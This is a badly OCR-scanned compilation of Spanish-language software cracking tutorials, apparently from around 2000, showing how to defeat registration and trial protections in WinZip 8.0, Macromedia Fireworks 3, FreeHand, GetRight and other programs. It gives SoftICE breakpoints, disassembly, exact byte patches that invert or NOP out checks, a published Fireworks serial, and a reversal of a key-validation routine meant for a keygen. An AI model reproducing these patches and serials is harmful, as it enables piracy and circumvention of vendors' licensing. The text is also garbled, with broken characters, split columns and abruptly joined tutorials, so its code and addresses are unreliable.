(12345) y si ponemos zxw37 nos registrara? Pues si chamigo ese es el serial!!! 


E  cmdok_Click 
9% TextBox:4ddRefLPINTERFACE:02460298) returns DWORD:1 
%  —_ vbaDb¡iSet(LPINTERFACE *D0D6CF3C8, LPINTERFACE:02460298] retums LF 
Ea txtcode.Text 
$ % TextBox:GetProp[LPINTERFACE:02460298, int:11, PTR:006CF304) 
% — GetFocus[) retums HWND:BO 
%  — Heapálloc[HáNDLE:02450000, FL4GS:00000000, D'wORD:00000006) re 
% — GetFocus[) retums HWwND:BO 
$ TextBox:GetProp retums HRESULT:0 
$ — MultiByteTow'ideCharlunsigned int: DOODOOOO, FLAG S:00000000, PTR:0245E 
$  —SysállocStringLen(PTR:D0000000, Dw*ORD:00000005) retums LPYOID:44.2€ 
% —MultiByteTow'ideCharlunsigned int:00000000, FL4GS:D0000000, PTR:0245E 
%  —HeapFree[/HANDLE:02450000, FL4GS:D0000000, PTR:0245E6E8) returns B 
Ea txtcode.Text 
$% Right$íString:'12345", long:5] 
[ $  —SysállocStringByteLeníchar *:004428C8, DW'ORD:00000004]) returns LPWOIL 
$% Riaht$ 
$  —_ vbaStiMove(String:""12345", LPBSTR:DD6CF3CC) returns DWDRD:44286C 
2 — vbaStCmpísSting:"zxw37", String:""12345""] returns DW*DRD:FFFFFFFF 


Crackeado por gr00vy 
Pagina: www.zencracking.com.ar 


Como crackear el Winzip 8.0 con el W32Dasm! 


Hola aca estoy de nuevo con mi ultimo tutorial, esta ves se tratara sobre como sacar la 
protección del winzip, este popular gestor de ficheros comprimidos. 


Bueno como ya sabemos lo primero a hacer es buscar la “Debilidad” de este programa. 
Una que le encontre, y que es la mas comun, es que cuando vamos a abrir el 
programa nos muestra unan nag box que nos dice que nos registremos, Presionamos 
en Enter Registration Code y ponemos un serial invalido, te muestra la siguiente dialog 
box. 


WinZip 


(X) Incomplete or incorrect information. 


Bueno ahora que, ya sabes la debilidad, que es lo que podemos hacer?, buscar en las 
string references?, dale probemos a ver que pasa. Uhmm yo no lo encontre asi que 
vamos a buscarlo manualmente con la linterna (find) de el W32Dasm. Lo 
encontramos!!! 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00407FAA(C), :00407FB3(C), :00407FBC(C) 


| 
:00408005 E89C020000 call 004082A6 


* Possible Reference to String Resource ID=00654: "Incomplete or incorrect 
information” 


| 
:0040800A 688E020000 push 0000028E 


:0040800F E8D9750300 call 0043F5ED 

:00408014 50 push eax 

:00408015 53 push ebx 

:00408016 6A3D push 0000003D 

:00408018 E808800200 call 00430025 

:0040801D 83C410 add esp, 00000010 

:00408020 FFO5F87A4800 inc dword ptr [00487AF8] 

:00408026 833DF87A480003 cmp dword ptr [00487AF8], 00000003 
:0040802D 0F85F9000000 jne 0040812C 

:00408033 6A00 push 00000000 


Uhmmm examinando ese trozo de codigo veo que este mensaje es llamado desde 
(C), :00407FB3(C), :00407FBC(C) y todos son condicionales o sea JE o JNE. 

Que curioso, vamos a ver. 

Apretamos el Boton de go to code location y aterrizamos aca: 


:00407F8F FF1528744700 Call dword ptr [00477428] 
:00407F95 56 push esi 


:00407F96 ESFF780300 call 0043F89A 


:00407F9B 56 push esi 

:00407F9C E822790300 call 0043F8C3 

:00407FA1 803D78CD480000 cmp byte ptr [0048CD78], 00 Tiene el nombre O 
letras? 

:00407FA8 59 pop ecx 

:00407FA9 59 pop ecx 

3 7459 je 00408005 Si tiene O se va al error!!! 

:00407FAC 803DA4CD480000 cmp byte ptr [0048CDA4], 00 Tiene nuestro 
S/N O digitos? 

: 7450 je 00408005 Si tiene O se va al error!!! 

:00407FB5 ES1BFAFFFF call 004079D5 RUTINA DE COMPROBACION PARA 
LOS QUE USAN SOFTICE!!! 

:00407FBA 85C0 test eax, eax Uhmm testea. 

: 7447 je 00408005 Si son iguales va al error 

:00407FBE 57 push edi 


Uhmm que casualidad los saltos estan uno casi alado del otro. Sera esta rutina 
importante? ; ) 


Si cambian esos saltos por JNE van a poder poner cualquier serial, pero no esta todo 
dicho!!! Figense iniciando de vuelta el winzip!!! Nos sale la nag!!!. 

Que podra ser? Uhmm vamos a mirar la call que genera el numero de serie: call 
004079D5 


* Referenced by a CALL at Addresses: 
|:0040108B  ,:00401221 ,:004041E8 ,:00407FB5 ,:00433D12 


| 
:004079D5 55 push ebp 


:004079D6 8BEC mov ebp, esp 

:004079D8 81EC08020000 sub esp, 00000208 

:004079DE 53 push ebx 

:004079DF 56 push esi 

:004079E0 33F6 xor esi, esi 

:004079E2 803D78CD480000 cmp byte ptr [0048CD78], 00 
:004079E9 57 push edi 

:004079EA 0F849A000000 je 00407A8A 

:004079F0 8D45EC lea eax, dword ptr [ebp-14] 
:004079F3 50 push eax 


Bueno esta es la rutina que nos caga el Registro! 

Lo que tenemos que hacer es ir viendo que hay en cada una d las llamadas: 
* Referenced by a CALL at Addresses: 

|1:0040108B  ,:00401221 ,:004041E8 ,:00407FB5 ,:00433D12 


ENTRAMOS EN 0040108B: 


:004010A7 C7400CC1020000 mov [eax+0C], 000002C1 
:004010AE 8D85D4FEFFFF lea eax, dword ptr [ebp+FFFFFED4] 
:004010B4 50 push eax 

:004010B5 E886680600 call 00467940 

:004010BA 8D85D4FEFFFF lea eax, dword ptr [ebp+FFFFFED4] 


:004010C0 682C010000 push 0000012C 


:004010C5 50 push eax 
:004010C6 E839E80300 call 0043F904 


NADA!!! 


ENTRAMOS EN 00401221: 


:00401221 ESAF670000 call 004079D5 
:00401226 85C0 test eax, eax 
:00401228 0F8573FFFFFF jne 004011A1 


Uhmmm esto me suena a comprobación!!! Cambiemos el JNE por JE!!! Ahora no es 75 
por 74 sino 85 por 84!!!! Cuidado 


PROVAMOS SI NOS REGISTRA Y NO LOGRAMOS NADA!!! 
TONSES SIGAMOS! 


ENTRAMOS EN 004041E8: 


:004041E8 E8E8370000 call 004079D5 
:004041ED 85C0 test eax, eax 
:004041EF 7531 jne 00404222 


Uhmm que parecido al de arriba!!! Probemos cambiarlo tambien por un JE!!!! Y que 


Bueno espero que les haya sido util este manual, y que lo disfruten. 


CRACKEADO POR gr00vy 
WEB: www.groovycracking.8m.com 


Como crackear el Macromedia Fireworks 3 


Hola amigos, como andan? Bien espero. Bueno hoy vamos a ver como crackear el 
Fireworks ya que como el Dreamweaver es casi lo mismo nos va a servir para practicar 
el manejo del SICE. 


Bueno como en el otro tuto nos vamos a Buy y ponemos todos los datos, después en 
la otra ventana que aparece, ponemos go off- line o algo asi para que no nos tengamos 
que conectar etc ect. 

Ok ahora se habilito la pantalla para ingresar el Unlocking Code, que como deven 

saber tiene que ser de 10 caracteres ya que si no lo es no pasa la comprobación. Un 
buen codigo puede ser abcdefghij o 1234567890, el que a uds les guste. Ok una vez 
puesto (con el SICE cargado) el Unlocking code, apretamos ctrl.+d y nos vamos al sice 
a poner un BPX, esta ves usaremos un bpx getdlgitemtexta como el Dreamweaver a 
ver si funciona. Y como pueden ver al apretar F5 y Ok nos salta el SICE, apretamos 
F11 para ir al codigo que llamo a la funcion Getdlgitemtexta y vemos algo igualito al 
Dreamweaver: 

Un push que nos pone nuestro Unlock kode falso, otras voludeces mas y al final un 
CMP OA y un JZ (JE) o sea que compara si nuestro U/C tiene 10 digitos o letras y si no 
tiene 10 sigue hacia un error asi que a nosotros nos va a saltar. 

Una ves que aterrizamos vamos viendo cuales son los registros que van cambiando, 
EAX ECX EDX etc. Generalmente cambian después de algo sospechoso como un CALL 
un PUSH etc asi que vos anda fijandote cuales son, y como deven saber el que cambia 
es EAX después de la segunda Call (CALL EN LA QUE SE GENERA EL U/C PARA LOS 
KEYINGENIERS) y nos tira un string como esta: YFYFED] YMC 

Y como ven es una string de 10 letras y la tenemos que provar. 

Algo que les puedo decir es que los productos macromedia usan una protección entr 
comillas llamada Sales Agent, que es muy popular pero no sirve para nada, ya que, 
como ven es muy facil de reventar. 


Serial de el Fireworks: 
FWW300- 65137-37255-19336 


Tambien prove este mismo metodo con el Drumbeat 2000 y funciono ya que es 
idénticamente igual, asi que prueben con todos los demas. 


E-mail: groovy26000yahoo.com.ar 


Web: www.zencracking.com.ar 
Grupo: [zCt!] 


| FreeHand $.0.1 


| Plataformas W95 
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Al Atake: 


Para empezar adelantamos la fecha unos 35 dias,corremos el programa y nos sale la nag con dos botones,el 
try(deshabilitado) y el exit.Le damos exit y volvemos la fecha a la actual, corremos de nuevo el programa y nos sale 
una ventana chiquita que nos dice que Warning quisimos hacer trampa,bla,bla,bla... o sea que hay algo que le avisa 
al programa que el trial expiro, y por mas que alteremos la fecha sigue expirado.Ok, softice time, ponemos un bpx 
enablewindow, F12 una vez, y estamos adentro y vemos una llamada al user32!'DialogboxparamaA(aqui se genera 
la ventana del Warning),asi que vamos a poner un nop en este call y en los push inmediatamente 
superiores.Anotamos la direccion y vemos el offset con el w32dsm: 


:0040828C 8815628D4300 mov byte ptr [00438D62], dl 
:00408292 6A00 push 00000000 

:00408294 68B06D4000 push 00406DB0 

:00408299 6A00 push 00000000 


* Possible Reference to Dialog: DialogID_0072 


:0040829B 6A72 push 00000072 
:0040829D 50 push eax 


* Reference To: USER32.DialogBoxParamA, Ord:008Eh 


:0040829E FF1588954400 Call dword ptr [00449588]-------- >aparecemos aca 
:004082A4 83F806 cmp eax, 00000006 

:004082A7 0F84EA000000 je 00408397 

:004082AD E9CC000000 ¡mp 0040837E 


En el hex cambiamos desde el offset 00007692 hasta 00007634 por 90, y luego salvamos los cambios, corremos el 
programa y chau,chau ventana, y ademas nos habilita el programa tambien!!!;.., o sea que ahora hemos tenido una 
mejora, si nos pasamos del trial, retrocedemos la fecha del sistema y nos va a habilitar igual, en este punto si sos 
caigiie(expresion usada en mi pais que equivale a no querer hacer nada), te puedes conformar con esto que es lo 
minimo, o si te gusta experimentar con lo desconocido, seguí (elegi esto ultimo):) 

Nos vamos al "futuro" de nuevo y ahi esta otra vez esa nag,bueno, vamos a ver que nos dice la ''autopsia"',,,,en el 
w32dsm,buscamos el string expired: 


:00405FDD 891D9C654300 mov dword ptr [0043659C], ebx 
:00405FE3 755C jne 00406041 


1:00405FE5 3935800E4400 cmp dword ptr [00440E80], esi 
|:00405FEB 741A je 00406007 

1:00405FED A120BB4300 mov eax, dword ptr [0043BB20] 
1:00405FF2 50 push eax 


* Possible StringData Ref from Data Obj ->"%s Expired" 


1:00405FF3 6800044200 push 0042C400-oaconacaaonas > aqui 
1;:00405FFS 6840794300 push 00437940 

:00405FFD ESBE9A0100 call 0041FACO 

1:00406002 83C40C add esp, 0000000C 

1:00406005 EB4C ¡mp 00406053 


¡Los dos saltos inmediatamente superiores son tentadores pero creo que no pasa nada con ellos (al menos para mi) 
llos analice y no vale la pena entrar en detalles. 
¡Bue..:) 55 instrucciones mas arriba esta una instruccion interesante : 


1:00405F2B 8B442410 mov eax, dword ptr [esp+10] 

1:00405F2F 83C0FE add eax, FFFFFFFE 

:00405F32 8$3FS1E cmp eax, 0000001 É<-==-nonoonoo====- cambiar 8$3f81e por 83£800 
:00405F35 0F8794020000 ja 004061CE <o=ooooncocncncnanmnmmamon 

1:00405F3B 33C9 xor ecx, ecx 

1:00405F3D 8A88F4614000 mov cl, byte ptr [eax+004061F4] 

1:00405F43 FF248DE0614000 ¡mp dword ptr [4*ecx+004061E0] 

1:00405F4A A1ECCE4300 mov eax, dword ptr [0043CEEC] 


¡Vemos una comparacion de el valor de eax con 1e<30 en decimal> podria ser por los 30 dias del trial Ponemos un 
¡bpx en la direccion del ja para ver que onda, y notamos que no va a saltar y como nuestra trial esta expirado 
¡tenemos que invertir < a la mas pura Ingenieria Inversa> 

¡para estar bien. 

¡El valor de eax en esa comparacion si no recuerd9o mal es 6 y tiene que ser major a 30 para que salte,para esto 
[facilmente podemos cambiar el 1e por 00 y siempre saltara ,,pero antes de eso vamos a ver si estamos en lo cierto. 
¡Como es un ja las flag c y z deben estar en cero para ocasionar el salto , hacemos que salte y le damos x y enter y 
|;¡¡pam!!! el invitado se ha presentado:) muy bien,,, ahora que estamos seguros vamos a hacer el cambio definitivo. 
¡Abrimos nuestro hex y hacemos los cambios (creo que no es necesario explicar comom parchar con el hex pues ya 
¡ha sido explicado en otros tutoriales),,,corremos el programa,,,Oh no algo pasa, el famoso mensaje de windoze de 
¡volcado de pila,pero no nos desesperemos,,,por la pinta lo mas probable es que al alterar el codigo hace un rato, 
¡provoco otro cambio en algun lugar del exe.Para ver donde el error, en la ventanita que nos aparece le damos click 
len detalles y nos proporciona la direccion donde se produjo el 'error fatal''.La direccion es 0040512 ponemos en el 
¡soft un bpx en dicha direccion y : 


1:00405127 6A04 push 00000004 

1:00405129 ES92A80100 call 0041F9C0 

1:0040512E OFAFC?7 imul eax, edi--------- >cambiar Ofafc7 por 909090 

1:00405131 OFAFC6 imul eax, esi---=--=--- >cambiar Ofafc6 por 909090 

1:00405134 83C404 add esp, 00000004 

1:00405137 85C0 test eax, eax 

1:00405139 C70064000000 mov dword ptr [eax], 00000064------- > Aqui aparecemos 
1:0040513F 7409 je 0040514A 


¡Vemos que eax tiene un valor de 00000000, ahora volvamos al editor hex y cambiemos el 1e por 00 de hace un rato 
la como estaba antes es decir 00 por 1e,corremos de nuevo el programa y nos debe parar el soft , ahora bien, notas 
lla diferencia que provoco el error???, el valor de eax ahora es 00cc05b0.Cinco instrucciones mas arriba hay un call 
|vamos a poner un nuevo bpx en esa instruccion para ver con que valor sale eax. 

OK sooomisononsóas pum!! pantallazo y estamos en el soft le damos F10 y nos vamos a la primera multiplicacion imul eax, 


edi, vemos que el valor de eax es 00ccO05b0(el numero que evitaria generar el error) o sea que al salir del call el 
valor de eax es el correcto pero se vuelve cero por culpa de las multiplicaciones,probablemente sea una 
comprobacion o algo asi,no le entiendo el significado ,lo que si se es que si evitamos las multiplicaciones el valor de 
eax=00cc05b0 que es lo q' queremos. 

En el cuadro de instrucciones estan los detalles que hay que cambiar en el hex y ademas cambiamos el ya famoso le 
por 00 de nuevo para probar si anda el parche. 

Corremos el programa ...... y el maldito error otra vez:(... vamos a ver si es en la misma direccion,, vemos en detalles 
y es en otra direccion:004025de,vamos en un flash a €Sa.......... 

mmmmmmz.... un momento,...... Si!!!! es la misma rutina que el error anterior esta la asignacion a eax de 64,mas 
arriba las dos multiplicaciones y el call,por lo tanto repitamos el proceso anterior, las dos imul por nop, ok ,vamos a 
probar, ....omocmmoosoo UHHHHHHH!!!!!! que alivio el programa se habilita. 

PD: Espero que a alguien le sirva este texto, me parece que esta muy improvizado pero me costo un monton. 

Hasta la proxima. 


FeelFree... 


Karpoff Spanis 
Tutorial Descargado de [LUtor 


How to crack GetRight 4.1.2 by gr00vy 


Herramientas: Soft |ce, W32Dasm, File inspector y hexworkshop. 
Nivel: Bueno 

Cracker: gr00vy 

E-mail: groovy26000yahoo.com.ar 

Web: www.zencracking.com.ar 


Buenas, que tal a todos, hoy vamos a crackear el getright, este popular (¿) gestor de 
downloads. 

Bueno lo primero que hacemos es cargar el sice, una vez hecho esto abrimos el getright, 
vamos a la parte donde tenemos que poner el Serial Number y ponemos cualquier s/n, 
luego abrimos el SICE con CTRL. + d y ponemos los siguientes breakpoints: 

Bpx getdlgitemtexta y getwindowtexta. Nos salta el getwindowtexta, apretamos F12 
para salir de la libreria y llegamos a GETRIGTH! una vez ahí, traceamos con F10 hasta 
que vemos algo como esto: 


:0040ACC1 E82D5E0B00 call 004C0AF3 

:0040ACC6 83C40C add esp, 0000000C 
:0040ACC9 8D4DFO lea ecx, dword ptr [ebp-10] 
:0040ACCC E835220600 call 0046CF06 

:0040ACD1 85C0 test eax, eax 

:0040ACD3 0F8495000000 je 0040AD6E 


Como ya deberan saber, las rutinas de comprobación de serials casi siempre son 
parecidas a esta que esta en negrita. Presten tambien atencion a 0O000000c que es la 
cantidad de caracteres de el serial valido. 

La verdad que este salto se me hace muy sospechos, que dicen lo invertimos? OK! 
hacemos r fl z y apretamos F5 o Ctrl + D para salir del sice, nos salta una ventanita que 
nos dice, gracias por registrame!!! Pero ojo, provemos abrir de vuelta el GetRight Para 
ver si se registro normalmente, es asi, esta totalmente funcional!!! Ok, que es lo que 
resta ahora???? Bueno, espero que hallan anotado la direccion del salto que invirtieron, 
ya que ahora lo que vamos a hacer es un crack para no tener que andar con el SICE 
cada ves que quieran crackearlo ok? Bueno, nos vamos al W32Dasm y abrimos el exe, 
nos vamos a la direccion del salto a invertir y anotamos el offset. Ahora abrimos el 
HexEditor preferido de cada uno y le ponemos goto offset o algo asi y caemos en algo 
asi como 0F8495000000 , aca solo cambiaremos el 0F84 por 0OF85 y lo salvamos y 
tenemos el getrigth para siempre!!! 


Espero que le halla gustado el tutorial, manden saludos al mail 
groovy26000yahoo.com.ar y si quieren manden algun tutorial de cracking o lo que se 
les ocurra que me hace falta!!! 


| POST-MORTEM CRACKING 
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Al Atake: 


Abrimos el programa en w32dasm,click en String Reference y buscamos por algo positivo,encontramos el ''Expired 
trial version'' le damos doble click i aparecemos aqui: 


:0042C571 C705B8EF8450000000000 mov dword ptr [0045F8B8], 00000000 
:0042C57B 85FF test edi, edi 

:0042C57D 7557 jne 0042C5D6 

:0042C57F 6A30 push 00000030 


* Reference To: USER32.MessageBeep, Ord:01BDh 
:0042C581 FF1564144400 Call dword ptr [00441464] 
* Possible Reference to String Resource ID=40214: "Expired Trial Version" 


:0042C587 68169D0000 push 00009D16 --->'' Aparecemos aqui'' 
:0042C58C ES2FFFFDFF call 0040C4C0 
:0042C591 830404 add esp, 00000004 


Notamos que un poco mas arriba esta un jne,le damos doble click y luego el boton jump to y nos lleva aqui: 


* Possible Reference to String Resource ID=40217: "Trial Version Reminder" 


| 

:0042C5D6 68199D0000 push 00009D19-------- >"Aqui" 
:0042C5DB ESEOFEFDFF call 0040C4C0 

:0042C5E0 83C404 add esp, 00000004 

:0042C5E3 50 push eax 

:0042C5E4 56 push esi 


* Reference To: USER32.SetWindowTextA, Ord:025Eh 


:0042C5E5 FF1530144400 Call dword ptr [00441430] 
:0042C5EB 57 push edi 


* Possible Reference to String Resource ID=40218: "Reminder: There are %d days remaining in your 30 day trial 
p" 


| 

:0042C5EC 681A9D0000 push 00009D1A 
:0042C5F1 ESCAFEFDFF call 0040C4C0 
1:0042C5F6 83C404 add esp, 00000004 


"Trial version reminder'Hmmmm...si no me equivoco parece ser la rutina de habilitacion del programa. 

Cuando nos pasemos los 30 dias no va a hacer el salto y nos aparecera que debemos registrarnos para seguir 
usandolo,por lo tanto, 

¡cambiemos el salto condicional por uno incondicional. 

¡Le damos return el w32dasm para volver del salto,ahora nos fijamos en el offset. 

Abrimos nuestro hex editor favorito(en mi caso uedit32) en el offset 0002c57d(en mi pc,esto puede variar),cambiar 
'el 75 por eb.La proteccion 

¡del trial ha sido deshabilitada. 


Ahora bien,el programa esta crackeado, pero al darle en help/about....obviamente nos sale el unregistered 
|version,solo para ser un poco mas exquisitos y ''limpiar'' mas el programa 

vamos a hacer que se cambie este mensaje por 'Registered version". 

En el string reference,buscamos "Registered version" ,doble click sobre ella y nos lleva aqui: 


:0040C11F 83F801 cmp eax, 00000001 

:0040C122 0F85E0000000 jne 0040C208--.------ >cambiar por nop 
:0040C128 8D8424B0000000 lea eax, dword ptr [esp+000000B0] 
:0040C13A 83C408 add esp, 00000008 

:0040C13D 85CO0 test eax, eax 

:0040C13F 7547 jne 0040C188---->cambiar por nop 


* Possible StringData Ref from Data Obj ->"Registered Version" 


| 

:0040C141 68F0454400 push 004445F0---------- >"Aqui" 
:0040C146 689F040000 push 0000049F 

:0040C14B 56 push esi 

:0040C14C FEDS call ebp 

:0040C14E 6A00 push 00000000 

:0040C150 68A0040000 push 000004A0 

:0040C155 56 push esi 

:0040C156 FFD7 call edi 


Inmediatamente arriba aparece un jne y un poco mas arriba otro. 

Podemos cambiar estos por nop para que el programa no salte.En nuestro hex cambiamos 

¡el 7547 por 9090 y el 0£f8520000000 cambiar por 909090909090.0k guardamos los cambios,en el programa le damos 
help/about.... 


Ahora solo nos falta el nagscreen del principio,vamos a usar el softice ahora para detectar que funcion genera la 
nag. 

Bpx CreateDialogBox,abrimos el programa y nada..,easy, no pasa naa,probemos con otro,bpx DialogboxparamaA, y 
'bingo!!!.F12 y estamos en el interior 

de nuestra victima.Anotamos la direccion del call dialogboxparama,para referencia en el w32dasm. 

¡PD: El softice se necesita en este caso para referencia pues no sabemos cual de todas las funciones genera la nag y 
no 

perdernos en el listado muerto. 

Buscamos esta direccion en el w32dasm y vemos esto: 


1:0042C6D5 8B542408 mov edx, dword ptr [esp+08] 


:0042C6D9 50 push €2X--- +. ...----- >nop 
:0042C6DA A188154600 mov eax, dword ptr [00461588] 
:0042C6DF 6880044200 push 00420480 

:0042C6E4 52 push edx------=--- >nop 


* Possible Reference to Dialog: DialoglID_0092 

| 

:0042C6E5 6892000000 push 00000092..----- >nop 
:0042C6EA 50 push eax------ >nop 

* Reference To: USER32.DialogBoxParamA, Ord:0093h 


| 
:0042C6EB FF15F4124400 Call dword ptr [004412F4]---->nop ''Aqui aparecemos" 


:0042C6F1 5E pop esi 
:0042C6F2 C20400 ret 0004 


Ahora solo nos resta deshacer el call y todos los push inmediatamente por encima de este(5 push). 
Ahora tenemos un supuesto "Full registered version" del programa.,sin ningun indicio q' nos diga lo contrario. 


FEELFREE-KOLGADO 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 
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| DESCripCión [Programa para Comparar ies. 

A 
url MA MA 


Introducción 


El programa no tiene limitaciones por no estar registrado, pero aparece una nag-screen 
cada vez que se arranca el programa. Hay una opción para registrarse, introduciendo el 
nombre, la empresa y la clave. 


El objetivo será localizar la rutina de validación de la clave, comprenderla, y hacer un 
generador de claves. 


Al Atake 


Lo primero es ver cómo reacciona el programa al intentar registrarnos. 


Ponemos un nombre, empresa y clave cualquiera, y nos aparece un mensaje de clave incorrecta. 

El mensaje es el típico MessageBox de windows, lo cual nos facilita el poder acercarnos a la rutina de 
comprobación de la clave. 
Así pues, vamos al Softlce(Ctrl+-D) ¡ponemos el breakpoint(BPX MessageBoxA) y volvemos al 
programa(Ctrl+D). 


Intentamos registrarnos nuevamente para ver si nuestro breakpoint hace efecto. 

Efectivamente, aparecemos en el Softlce, en la rutina MessageBoxA de la USER32.DLL del windows. 
Le damos a la tecla F12 para ver quién ha llamado a esta rutina. 
Después de un Enter, ya estamos en la parte del código del programa FCOMPARE 


Con un par más de F12 nos situaremos en 014F:00408FCO, y unas líneas antes podemos ver una parte 
interesante del código : 


014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 


5 a o a BL o o A A a o o A | 


:00408F9B 
:00408F9E 
:00408FA1 
:00408FA2 
:00408FA5 
:00408FA6 
:00408FA7 
:00408FAC 
:00408FAF 
:00408FB1 
:00408FB3 
:00408FB5 
:00408FBA 
:00408FBB 
:00408FC0 


8B45E8 
8B4DEO 

50 

8B55E4 

51 

52 
E854020000 
83C40C 
85C0 

7531 

6A11 
A1DC5D4400 
50 
E8706B0000 
83C408 


MOV EAX, [EBP-18] ¡Clave 
MOV ECX, [EBP-20] ¡Empresa 
PUSH EAX 

MOV EDX, [EBP-1C] ¡Nombre 
PUSH ECX 

PUSH EDX 

CALL 00409200 ¿¡ValidaClave 
ADD ESP,O0C 

TEST EAX, EHEAX 

JNZ 00408FE4 

PUSH 11 

MOV EAX, [00445DDC] 

PUSH EAX 

CALL 0040FB30 

ADD ESP,08 


Así pues, la validación de la clave introducida se hace en la rutina que empieza en :409200 

Vamos pallí.... Ponemos un breakpoint en :108FA7 haciendo doble clic en esa línea, quitamos el anterior 
breakpoint con BD 0, y retornamos al programa con FS5. 
Volvemos a registrarnos, y el Softlce se parará por el breakpoint. Podemos ver los datos que se le pasan a 
la rutina de validación mirando el contenido de eax, ecx y edx (D EDX) 


Con F8 entramos en la rutina de :409200 


Lo primero que hace, es verificar que la clave tenga exactamente 8 posiciones. 


Luego comprueba que sólo contenga letras de '0' a'9, de 'a' a'f, y de 'A' a'F. 

Seguidamente las va acumulando en ESI, de tal manera que al final ESIZClave. 
Entonces calcula un número en función de la empresa, que guarda en EDI. Luego calcula otro número esta 
vez en función del nombre, que se suma a EDI. 
Finalmente a EDI se le suma ESI, y se incrementa en 1. En estos momentos, si EDI vale O, la clave se 
considera válida, sinó es incorrecta. Todo esto se puede ver en : 


014 
014 
014 
014 
014 
014 
014 
014 


15 o a Mc a A 


:00409200 
:00409201 
:00409202 
:00409204 
:00409208 
:00409209 
:0040920F 
:00409212 


56 

37 

33F6 
8B7C2414 
> 


Fr1548A84400 


83F808 
7405 


PUSH 
PUSH 
XOR 
MOV 
PUSH 
CALL 
CMP 
JZ 


ESI 
EDI 
ESI,ESI 


¡¿ ESI=0 


EDI, [ESP+14] 


EDI 


[KERNEL32!1strlen] 


EAX, 08 
00409219 


¡Clave de 8 posiciones? 


014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 
014 


15 Mc a a A o o A o o A o o o A A A o o A A A o A A o o o o o o o o o A A o o A o A o A o o o o A A A 


:00409214 
:00409216 
:00409217 
:00409218 
:00409219 
:0040921B 
:0040921€C 
:0040921E 
:00409220 
:00409223 
:00409225 
:00409227 
:00409229 
:0040922B 
:0040922E 
:00409231 
:00409233 
:00409235 
:00409237 
:00409239 


:00409255 
:00409256 
:00409258 
:0040925A 
:0040925E 
:0040925F 
:00409264 
:00409267 
:00409269 
:0040926D 
:0040926E 
:00409273 
:00409276 
:00409278 
:0040927A 
:0040927B 
:0040927E 
:0040927F 
:00409281 
:00409282 
:00409284 
:00409285 
:00409287 
:00409288 
:00409289 


33C0 
5F 

SE 

Cc3 
8A07 
47 
84C0 
743A 
Cc1E604 
3C30 
7COC 
3C39 
7F08 
OFBECO 
83E830 
EB1E 
3C61 
7COC 
3C66 
7F08 
OFBECO 
83E857 
EBOE 
3Cc41 
7C3E 
3C46 
7F3A 
OFBECO 
83E837 
03F0 
8A07 
47 
84C0 
75C6 
8B442410 
50 
E83CFEFFFFF 
830404 
8BF8 
8B44240C 
50 
E82DFFFFFF 
830404 
03F8 
O3FE 
47 
83FF01 
E 
1BCO 
DE 
F"7D8 
Cc3 
33C0 
5F 

DE 

Cc3 


XOR 
POP 
POP 
RET 
MOV 
INC 
TEST 
JZ 
SHL 
CMP 
JL 
CMP 
JG 
MOVSX 
SUB 
JMP 
CMP 
JL 
CMP 
JG 
MOVSX 
SUB 
JMP 
CMP 
JL 
CMP 
JG 
MOVSX 
SUB 
ADD 
MOV 
INC 
TEST 
JINZ 
MOV 
PUSH 
CALL 
ADD 
MOV 
MOV 
PUSH 
CALL 
ADD 
ADD 
ADD 
INC 
CMP 
POP 
SBB 
POP 
NEG 
RET 
XOR 
POP 
POP 
RET 


EAX, EAX 
EDI 
ESI 


AL, [EDI] 
EDI 
AL,AL 
0040925A 
ESI,04 
AL,30 
00409233 
AL, 39 
00409233 
EAX, AL 
EAX,30 
00409251 
AL, 61 
00409243 
AL, 66 
00409243 
EAX, AL 
EAX, 57 
00409251 
AL, 41 
00409285 
AL, 46 
00409285 
EAX, AL 
EAX, 37 
ESI,EAX 
AL, [EDI] 
EDI 
AL,AL 
00409220 


EAX, [ESP+10] 


EAX 
004091A0 
ESP, 04 
EDI, EAX 


EAX, [ESP+0C] 


EAX 
004091A0 
ESP, 04 
EDI, EAX 
EDI,ESI 
EDI 
EDI,01 
EDI 
EAX, EAX 
ESI 

EAX 


EAX, EAX 
EDI 
ESI 


¡Clave incorrecta 


¿Comprueba letra 


¡Entre 'a' 


r 


ES 


¡Añade letra a ESI 


¿Bucle para las 8 letras 
¿Empresa (n*1) 


¿Calcula Número 


¡EDI = n*1 
¿Nombre (n*2) 


¿Calcula Número 
¡EDI=n*1 + n*2 
¡EDI=n*1 + n*2 + ESI 
¡EDI=n*1 + n*2 + ESI + 1 
¡¿Assigna el BitDeAcarreo 
¡EAX=EAX-EAX-BitDeAcarreo 


¡Pone EAX=1 si Clave OK 


¡Clave incorrecta 


Así pues, n*”_Empresa + n*_Nombre + n*_Clave + 1 = 0 determina que la clave sea correcta. 

O lo que es lo mismo, que Clave = - n*_Empresa - n”_Nombre - 1 

Ahora ya sabemos cómo se calcula la clave, pero para poder hacer el generador de claves, necesitamos 
saber cómo se calcula el número en función del nombre y la empresa. 

De ello se encarga la rutina que empieza en :4091A0 : 


014F:004091A0 56 PUSH ESI 
014F:004091A1 57 PUSH EDI 
014F:004091A2 33FF XOR EDI,EDI 
014F:004091A4 8B74240C MOV ESI, [ESP+0C] 
014F:004091A8 56 PUSH ESI 
014F:004091A9 FF1548A84400 CALL [KERNEL32!1strlen] 
014F:004091AF 83F804 -- CMP EAX, 04 
014F:004091B2 7216 (D| JB 004091CA 
014F:004091B4 8BC8 | MOV ECX, EAX 
014F:004091B6 C1E902 |. SHR ECX, 02 
014F:004091B9 8D148D00000000 | LEA EDX, [ECX*4+00000000] 
014F:004091C0  2BC2 | SUB EAX, EDX 
014F:004091C2 033E | ADD EDI, [ESI] 
014F:004091C4 83C604 | ADD ESI,04 
014F:004091C7 49 | DEC ECX 
014F:004091C8 75F8 =- JNZ 004091C2 
014F:004091CA 83F802 -- CMP EAX, 02 
014F:004091CD 721C (2)| 3B 004091EB 
014F:004091CF 8BDO | MOV EDX, EAX 
014F:004091D1  C1EAO1 |. SHR EDX, 01 
014F:004091D4 8D0C5500000000 | LEA ECX, [EDX*2+00000000] 
014F:004091DB  2BC1 | SUB EAX, ECX 
014F:004091DD  33C9 | XOR ECX, ECX 
